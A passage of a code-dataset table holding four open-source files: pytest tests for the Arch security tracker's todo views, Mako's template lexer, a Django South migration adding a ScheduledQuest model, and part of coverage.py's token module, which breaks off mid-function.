repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
jelly/arch-security-tracker
test/test_todo.py
3
11364
from flask import url_for from tracker.advisory import advisory_get_label from tracker.model.cve import issue_types from tracker.model.enum import Publication from tracker.model.enum import Remote from tracker.model.enum import Severity from tracker.model.enum import Status from .conftest import DEFAULT_ADVISORY_ID from .conftest import DEFAULT_GROUP_ID from .conftest import DEFAULT_GROUP_NAME from .conftest import create_advisory from .conftest import create_group from .conftest import create_issue from .conftest import create_package @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_issue(id='CVE-1111-2222', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') def test_todo_success(db, client): resp = client.get(url_for('tracker.todo')) assert 200 == resp.status_code @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_issue(id='CVE-1111-2222', issue_type=issue_types[2]) @create_issue(id='CVE-1111-3333', issue_type=issue_types[2], remote=Remote.local, description='w00t', severity=Severity.high) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_group(id=123, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_group(id=456, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-3') @create_group(id=789, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-3', status=Status.unknown) @create_group(id=4242, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, advisory_type='multiple issues') 
@create_advisory(id=advisory_get_label(number=2), group_package_id=2, advisory_type='multiple issues', publication=Publication.published) def test_todo_json_success(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert data['advisories']['scheduled'] assert data['advisories']['incomplete'] assert data['advisories']['unhandled'] assert data['groups']['unknown'] assert data['groups']['bumped'] assert data['issues']['orphan'] assert data['issues']['unknown'] def test_todo_json_empty(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['advisories']['scheduled'] assert not data['advisories']['incomplete'] assert not data['advisories']['unhandled'] assert not data['groups']['unknown'] assert not data['groups']['bumped'] assert not data['issues']['orphan'] assert not data['issues']['unknown'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') def test_todo_advisory_unhandled(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['advisories']['unhandled']) advisory = next(iter(data['advisories']['unhandled'])) assert advisory['name'] == DEFAULT_GROUP_NAME assert advisory['status'] == Status.fixed @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, group_package_id=2, 
publication=Publication.scheduled) def test_todo_advisory_scheduled(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['advisories']['scheduled']) advisory = next(iter(data['advisories']['scheduled'])) assert advisory['name'] == DEFAULT_ADVISORY_ID assert advisory['package'] == 'bar' @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, group_package_id=2, publication=Publication.published) def test_todo_advisory_incomplete(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['advisories']['incomplete']) advisory = next(iter(data['advisories']['incomplete'])) assert advisory['name'] == DEFAULT_ADVISORY_ID assert advisory['package'] == 'bar' @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, group_package_id=2, publication=Publication.published, content='broken!', impact='snafu', reference='https://foo.bar') def test_todo_advisory_not_incomplete_with_data(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['advisories']['incomplete'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[0]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, 
issues=['CVE-1111-1111'], packages=['foo'], status=Status.unknown, affected='1.2.3-3', fixed='1.2.3-4') def test_todo_group_unknown_by_status(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['groups']['unknown']) group = next(iter(data['groups']['unknown'])) assert DEFAULT_GROUP_NAME == group['name'] assert ['foo'] == group['packages'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1], severity=Severity.high) @create_package(name='foo', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3', fixed='1.2.3-4') def test_todo_group_not_unknown_with_data(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['groups']['unknown'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3') def test_todo_group_bumped(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['groups']['bumped']) group = next(iter(data['groups']['bumped'])) assert DEFAULT_GROUP_NAME == group['name'] assert ['foo'] == group['packages'] assert '1.2.3-4' in next(iter(group['versions']))['version'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1]) @create_package(name='foo', base='lol', version='1.2.3-3') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3') def test_todo_group_not_bumped_when_same(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not 
data['groups']['bumped'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) def test_todo_issues_orphan(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['orphan']) issue = next(iter(data['issues']['orphan'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-3') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3') def test_todo_issues_referenced_not_orphan(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['issues']['orphan'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2], remote=Remote.remote, severity=Severity.low, description='yay') def test_todo_issues_not_unknown_with_data(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['issues']['unknown'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[0], remote=Remote.remote, severity=Severity.low, description='yay') def test_todo_issues_unknown_without_type(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1], remote=Remote.unknown, severity=Severity.low, description='yay') def test_todo_issues_unknown_without_remote(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 
'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[0], remote=Remote.remote, severity=Severity.unknown, description='yay') def test_todo_issues_unknown_without_severity(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1], remote=Remote.remote, severity=Severity.low, description='') def test_todo_issues_unknown_without_description(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name']
mit
jealousrobot/PlexArt
lib/mako/lexer.py
61
16495
# mako/lexer.py # Copyright (C) 2006-2016 the Mako authors and contributors <see AUTHORS file> # # This module is part of Mako and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """provides the Lexer class for parsing template strings into parse trees.""" import re import codecs from mako import parsetree, exceptions, compat from mako.pygen import adjust_whitespace _regexp_cache = {} class Lexer(object): def __init__(self, text, filename=None, disable_unicode=False, input_encoding=None, preprocessor=None): self.text = text self.filename = filename self.template = parsetree.TemplateNode(self.filename) self.matched_lineno = 1 self.matched_charpos = 0 self.lineno = 1 self.match_position = 0 self.tag = [] self.control_line = [] self.ternary_stack = [] self.disable_unicode = disable_unicode self.encoding = input_encoding if compat.py3k and disable_unicode: raise exceptions.UnsupportedError( "Mako for Python 3 does not " "support disabling Unicode") if preprocessor is None: self.preprocessor = [] elif not hasattr(preprocessor, '__iter__'): self.preprocessor = [preprocessor] else: self.preprocessor = preprocessor @property def exception_kwargs(self): return {'source': self.text, 'lineno': self.matched_lineno, 'pos': self.matched_charpos, 'filename': self.filename} def match(self, regexp, flags=None): """compile the given regexp, cache the reg, and call match_reg().""" try: reg = _regexp_cache[(regexp, flags)] except KeyError: if flags: reg = re.compile(regexp, flags) else: reg = re.compile(regexp) _regexp_cache[(regexp, flags)] = reg return self.match_reg(reg) def match_reg(self, reg): """match the given regular expression object to the current text position. if a match occurs, update the current text and line position. 
""" mp = self.match_position match = reg.match(self.text, self.match_position) if match: (start, end) = match.span() if end == start: self.match_position = end + 1 else: self.match_position = end self.matched_lineno = self.lineno lines = re.findall(r"\n", self.text[mp:self.match_position]) cp = mp - 1 while (cp >= 0 and cp < self.textlength and self.text[cp] != '\n'): cp -= 1 self.matched_charpos = mp - cp self.lineno += len(lines) # print "MATCHED:", match.group(0), "LINE START:", # self.matched_lineno, "LINE END:", self.lineno # print "MATCH:", regexp, "\n", self.text[mp : mp + 15], \ # (match and "TRUE" or "FALSE") return match def parse_until_text(self, watch_nesting, *text): startpos = self.match_position text_re = r'|'.join(text) brace_level = 0 paren_level = 0 bracket_level = 0 while True: match = self.match(r'#.*\n') if match: continue match = self.match(r'(\"\"\"|\'\'\'|\"|\')[^\\]*?(\\.[^\\]*?)*\1', re.S) if match: continue match = self.match(r'(%s)' % text_re) if match and not (watch_nesting and (brace_level > 0 or paren_level > 0 or bracket_level > 0)): return \ self.text[startpos: self.match_position - len(match.group(1))],\ match.group(1) elif not match: match = self.match(r"(.*?)(?=\"|\'|#|%s)" % text_re, re.S) if match: brace_level += match.group(1).count('{') brace_level -= match.group(1).count('}') paren_level += match.group(1).count('(') paren_level -= match.group(1).count(')') bracket_level += match.group(1).count('[') bracket_level -= match.group(1).count(']') continue raise exceptions.SyntaxException( "Expected: %s" % ','.join(text), **self.exception_kwargs) def append_node(self, nodecls, *args, **kwargs): kwargs.setdefault('source', self.text) kwargs.setdefault('lineno', self.matched_lineno) kwargs.setdefault('pos', self.matched_charpos) kwargs['filename'] = self.filename node = nodecls(*args, **kwargs) if len(self.tag): self.tag[-1].nodes.append(node) else: self.template.nodes.append(node) # build a set of child nodes for the control line # 
(used for loop variable detection) # also build a set of child nodes on ternary control lines # (used for determining if a pass needs to be auto-inserted if self.control_line: control_frame = self.control_line[-1] control_frame.nodes.append(node) if not (isinstance(node, parsetree.ControlLine) and control_frame.is_ternary(node.keyword)): if self.ternary_stack and self.ternary_stack[-1]: self.ternary_stack[-1][-1].nodes.append(node) if isinstance(node, parsetree.Tag): if len(self.tag): node.parent = self.tag[-1] self.tag.append(node) elif isinstance(node, parsetree.ControlLine): if node.isend: self.control_line.pop() self.ternary_stack.pop() elif node.is_primary: self.control_line.append(node) self.ternary_stack.append([]) elif self.control_line and \ self.control_line[-1].is_ternary(node.keyword): self.ternary_stack[-1].append(node) elif self.control_line and \ not self.control_line[-1].is_ternary(node.keyword): raise exceptions.SyntaxException( "Keyword '%s' not a legal ternary for keyword '%s'" % (node.keyword, self.control_line[-1].keyword), **self.exception_kwargs) _coding_re = re.compile(r'#.*coding[:=]\s*([-\w.]+).*\r?\n') def decode_raw_stream(self, text, decode_raw, known_encoding, filename): """given string/unicode or bytes/string, determine encoding from magic encoding comment, return body as unicode or raw if decode_raw=False """ if isinstance(text, compat.text_type): m = self._coding_re.match(text) encoding = m and m.group(1) or known_encoding or 'ascii' return encoding, text if text.startswith(codecs.BOM_UTF8): text = text[len(codecs.BOM_UTF8):] parsed_encoding = 'utf-8' m = self._coding_re.match(text.decode('utf-8', 'ignore')) if m is not None and m.group(1) != 'utf-8': raise exceptions.CompileException( "Found utf-8 BOM in file, with conflicting " "magic encoding comment of '%s'" % m.group(1), text.decode('utf-8', 'ignore'), 0, 0, filename) else: m = self._coding_re.match(text.decode('utf-8', 'ignore')) if m: parsed_encoding = m.group(1) else: 
parsed_encoding = known_encoding or 'ascii' if decode_raw: try: text = text.decode(parsed_encoding) except UnicodeDecodeError: raise exceptions.CompileException( "Unicode decode operation of encoding '%s' failed" % parsed_encoding, text.decode('utf-8', 'ignore'), 0, 0, filename) return parsed_encoding, text def parse(self): self.encoding, self.text = self.decode_raw_stream( self.text, not self.disable_unicode, self.encoding, self.filename) for preproc in self.preprocessor: self.text = preproc(self.text) # push the match marker past the # encoding comment. self.match_reg(self._coding_re) self.textlength = len(self.text) while (True): if self.match_position > self.textlength: break if self.match_end(): break if self.match_expression(): continue if self.match_control_line(): continue if self.match_comment(): continue if self.match_tag_start(): continue if self.match_tag_end(): continue if self.match_python_block(): continue if self.match_text(): continue if self.match_position > self.textlength: break raise exceptions.CompileException("assertion failed") if len(self.tag): raise exceptions.SyntaxException("Unclosed tag: <%%%s>" % self.tag[-1].keyword, **self.exception_kwargs) if len(self.control_line): raise exceptions.SyntaxException( "Unterminated control keyword: '%s'" % self.control_line[-1].keyword, self.text, self.control_line[-1].lineno, self.control_line[-1].pos, self.filename) return self.template def match_tag_start(self): match = self.match(r''' \<% # opening tag ([\w\.\:]+) # keyword ((?:\s+\w+|\s*=\s*|".*?"|'.*?')*) # attrname, = \ # sign, string expression \s* # more whitespace (/)?> # closing ''', re.I | re.S | re.X) if match: keyword, attr, isend = match.groups() self.keyword = keyword attributes = {} if attr: for att in re.findall( r"\s*(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")", attr): key, val1, val2 = att text = val1 or val2 text = text.replace('\r\n', '\n') attributes[key] = text self.append_node(parsetree.Tag, keyword, attributes) if isend: 
self.tag.pop() else: if keyword == 'text': match = self.match(r'(.*?)(?=\</%text>)', re.S) if not match: raise exceptions.SyntaxException( "Unclosed tag: <%%%s>" % self.tag[-1].keyword, **self.exception_kwargs) self.append_node(parsetree.Text, match.group(1)) return self.match_tag_end() return True else: return False def match_tag_end(self): match = self.match(r'\</%[\t ]*(.+?)[\t ]*>') if match: if not len(self.tag): raise exceptions.SyntaxException( "Closing tag without opening tag: </%%%s>" % match.group(1), **self.exception_kwargs) elif self.tag[-1].keyword != match.group(1): raise exceptions.SyntaxException( "Closing tag </%%%s> does not match tag: <%%%s>" % (match.group(1), self.tag[-1].keyword), **self.exception_kwargs) self.tag.pop() return True else: return False def match_end(self): match = self.match(r'\Z', re.S) if match: string = match.group() if string: return string else: return True else: return False def match_text(self): match = self.match(r""" (.*?) # anything, followed by: ( (?<=\n)(?=[ \t]*(?=%|\#\#)) # an eval or line-based # comment preceded by a # consumed newline and whitespace | (?=\${) # an expression | (?=</?[%&]) # a substitution or block or call start or end # - don't consume | (\\\r?\n) # an escaped newline - throw away | \Z # end of string )""", re.X | re.S) if match: text = match.group(1) if text: self.append_node(parsetree.Text, text) return True else: return False def match_python_block(self): match = self.match(r"<%(!)?") if match: line, pos = self.matched_lineno, self.matched_charpos text, end = self.parse_until_text(False, r'%>') # the trailing newline helps # compiler.parse() not complain about indentation text = adjust_whitespace(text) + "\n" self.append_node( parsetree.Code, text, match.group(1) == '!', lineno=line, pos=pos) return True else: return False def match_expression(self): match = self.match(r"\${") if match: line, pos = self.matched_lineno, self.matched_charpos text, end = self.parse_until_text(True, r'\|', r'}') 
if end == '|': escapes, end = self.parse_until_text(True, r'}') else: escapes = "" text = text.replace('\r\n', '\n') self.append_node( parsetree.Expression, text, escapes.strip(), lineno=line, pos=pos) return True else: return False def match_control_line(self): match = self.match( r"(?<=^)[\t ]*(%(?!%)|##)[\t ]*((?:(?:\\r?\n)|[^\r\n])*)" r"(?:\r?\n|\Z)", re.M) if match: operator = match.group(1) text = match.group(2) if operator == '%': m2 = re.match(r'(end)?(\w+)\s*(.*)', text) if not m2: raise exceptions.SyntaxException( "Invalid control line: '%s'" % text, **self.exception_kwargs) isend, keyword = m2.group(1, 2) isend = (isend is not None) if isend: if not len(self.control_line): raise exceptions.SyntaxException( "No starting keyword '%s' for '%s'" % (keyword, text), **self.exception_kwargs) elif self.control_line[-1].keyword != keyword: raise exceptions.SyntaxException( "Keyword '%s' doesn't match keyword '%s'" % (text, self.control_line[-1].keyword), **self.exception_kwargs) self.append_node(parsetree.ControlLine, keyword, isend, text) else: self.append_node(parsetree.Comment, text) return True else: return False def match_comment(self): """matches the multiline version of a comment""" match = self.match(r"<%doc>(.*?)</%doc>", re.S) if match: self.append_node(parsetree.Comment, match.group(1)) return True else: return False
gpl-3.0
drawquest/drawquest-web
website/drawquest/apps/quests/migrations/0001_initial.py
2
9728
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'ScheduledQuest' db.create_table('quests_scheduledquest', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('comment', self.gf('django.db.models.fields.related.ForeignKey')(related_name='scheduled_quests', to=orm['canvas.Comment'])), ('curator', self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name='scheduled_quests', null=True, blank=True, to=orm['auth.User'])), ('timestamp', self.gf('canvas.util.UnixTimestampField')(default=0)), ('sort', self.gf('django.db.models.fields.IntegerField')()), )) db.send_create_signal('quests', ['ScheduledQuest']) def backwards(self, orm): # Deleting model 'ScheduledQuest' db.delete_table('quests_scheduledquest') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': 
('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'canvas.category': { 'Meta': {'object_name': 'Category'}, 'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}), 'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}), 'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.comment': { 'Meta': 
{'object_name': 'Comment'}, 'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}), 'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}), 'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}), 'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), 'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.content': { 'Meta': {'object_name': 'Content'}, 'alpha': 
('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}), 'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'remixes'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'remix_text': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}), 'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}), 'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'used_as_stamp'", 'blank': 'True', 'to': "orm['canvas.Content']"}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.ContentUrlMapping']", 'null': 'True', 'blank': 'True'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.contenturlmapping': { 'Meta': {'object_name': 'ContentUrlMapping'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'canvas_auth.user': { 'Meta': {'object_name': 'User', 'db_table': "'auth_user'", '_ormbases': ['auth.User'], 'proxy': 'True'} }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'quests.scheduledquest': { 'Meta': 
{'ordering': "['sort']", 'object_name': 'ScheduledQuest'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'scheduled_quests'", 'to': "orm['canvas.Comment']"}), 'curator': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'scheduled_quests'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'sort': ('django.db.models.fields.IntegerField', [], {}), 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}) } } complete_apps = ['quests']
bsd-3-clause
tmpgit/intellij-community
python/helpers/coverage/phystokens.py
160
7401
"""Better tokenizing for coverage.py.""" import codecs, keyword, re, sys, token, tokenize from coverage.backward import set # pylint: disable=W0622 from coverage.parser import generate_tokens def phys_tokens(toks): """Return all physical tokens, even line continuations. tokenize.generate_tokens() doesn't return a token for the backslash that continues lines. This wrapper provides those tokens so that we can re-create a faithful representation of the original source. Returns the same values as generate_tokens() """ last_line = None last_lineno = -1 last_ttype = None for ttype, ttext, (slineno, scol), (elineno, ecol), ltext in toks: if last_lineno != elineno: if last_line and last_line.endswith("\\\n"): # We are at the beginning of a new line, and the last line # ended with a backslash. We probably have to inject a # backslash token into the stream. Unfortunately, there's more # to figure out. This code:: # # usage = """\ # HEY THERE # """ # # triggers this condition, but the token text is:: # # '"""\\\nHEY THERE\n"""' # # so we need to figure out if the backslash is already in the # string token or not. inject_backslash = True if last_ttype == tokenize.COMMENT: # Comments like this \ # should never result in a new token. inject_backslash = False elif ttype == token.STRING: if "\n" in ttext and ttext.split('\n', 1)[0][-1] == '\\': # It's a multiline string and the first line ends with # a backslash, so we don't need to inject another. inject_backslash = False if inject_backslash: # Figure out what column the backslash is in. ccol = len(last_line.split("\n")[-2]) - 1 # Yield the token, with a fake token type. yield ( 99999, "\\\n", (slineno, ccol), (slineno, ccol+2), last_line ) last_line = ltext last_ttype = ttype yield ttype, ttext, (slineno, scol), (elineno, ecol), ltext last_lineno = elineno def source_token_lines(source): """Generate a series of lines, one for each line in `source`. 
Each line is a list of pairs, each pair is a token:: [('key', 'def'), ('ws', ' '), ('nam', 'hello'), ('op', '('), ... ] Each pair has a token class, and the token text. If you concatenate all the token texts, and then join them with newlines, you should have your original `source` back, with two differences: trailing whitespace is not preserved, and a final line with no newline is indistinguishable from a final line with a newline. """ ws_tokens = set([token.INDENT, token.DEDENT, token.NEWLINE, tokenize.NL]) line = [] col = 0 source = source.expandtabs(8).replace('\r\n', '\n') tokgen = generate_tokens(source) for ttype, ttext, (_, scol), (_, ecol), _ in phys_tokens(tokgen): mark_start = True for part in re.split('(\n)', ttext): if part == '\n': yield line line = [] col = 0 mark_end = False elif part == '': mark_end = False elif ttype in ws_tokens: mark_end = False else: if mark_start and scol > col: line.append(("ws", " " * (scol - col))) mark_start = False tok_class = tokenize.tok_name.get(ttype, 'xx').lower()[:3] if ttype == token.NAME and keyword.iskeyword(ttext): tok_class = "key" line.append((tok_class, part)) mark_end = True scol = 0 if mark_end: col = ecol if line: yield line def source_encoding(source): """Determine the encoding for `source` (a string), according to PEP 263. Returns a string, the name of the encoding. """ # Note: this function should never be called on Python 3, since py3 has # built-in tools to do this. assert sys.version_info < (3, 0) # This is mostly code adapted from Py3.2's tokenize module. 